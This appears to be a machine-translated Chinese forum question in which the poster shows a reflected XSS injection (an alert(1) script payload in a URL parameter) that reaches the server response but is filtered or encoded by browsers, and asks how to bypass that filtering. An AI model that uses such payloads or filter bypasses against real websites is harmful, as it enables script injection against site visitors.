我有一个简单的XXS攻击,它似乎成功地将代码注入到服务器的响应中,但是被浏览器过滤了。到目前为止,我尝试过Google Chrome,Firefox和Internet Explorer。我怎么能绕过这个?
以下是通过Netcat的原始客户端请求和服务器响应(注入粗体):
请求
GET /example.com?0eb78">alert(1)12bbb=1 HTTP / 1.1 主机:示例接受: / 接受语言:用户代理:Mozilla / 5.0 (兼容; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident / 5.0) 连接:关闭
响应包含
警报(1)12bbb = 1" >
但是,浏览器网址请求和响应如下:
网址请求:
http://example.com?0eb78“>警报(1)12bbb = 1
已过滤的网页来源:
<form id="contact_form" method="post" action="http://example.com?0eb78%22%3E%3Cscript%3Ealert(1)%3C/script%3E12bbb">